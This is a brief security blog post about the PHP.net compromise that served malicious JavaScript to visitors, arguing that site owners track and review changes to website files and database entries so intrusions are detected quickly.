PHP.net Compromise - Tracking Changes

Most everyone within the information security industry is familiar with last week’s compromise of PHP.net, which caused the site to serve malicious JavaScript for some time.

I won’t rehash the details of the compromise (follow the link for that), but the important piece for me was this:


The compromise was discovered Thursday morning by Google’s safe browsing service, which helps the Chrome, Firefox, and Safari browsers automatically block sites that serve drive-by exploits. Traces of the malicious JavaScript code served to some php.net visitors were captured and posted to Hacker News here and, in the form of a pcap file, to a Barracuda Networks blog post here. The attacks started Tuesday and lasted through Thursday morning, PHP officials wrote in a statement posted late that evening.

While it is fantastic to successfully block attacks, everyone gets compromised at some point, which is why I believe it is critical to develop the capability to rapidly detect, respond to, and contain those compromises. Finding out you’re compromised from a search company (Google) and third parties is not ideal.

I like to learn from incidents and a lesson from this incident that would aid in detecting the compromise quickly, would be to track and review all changes to website files or database entries.